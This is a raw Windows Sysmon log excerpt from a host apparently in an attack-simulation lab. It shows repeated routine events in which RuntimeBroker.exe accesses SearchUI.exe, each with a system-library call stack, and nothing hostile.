12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.602{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
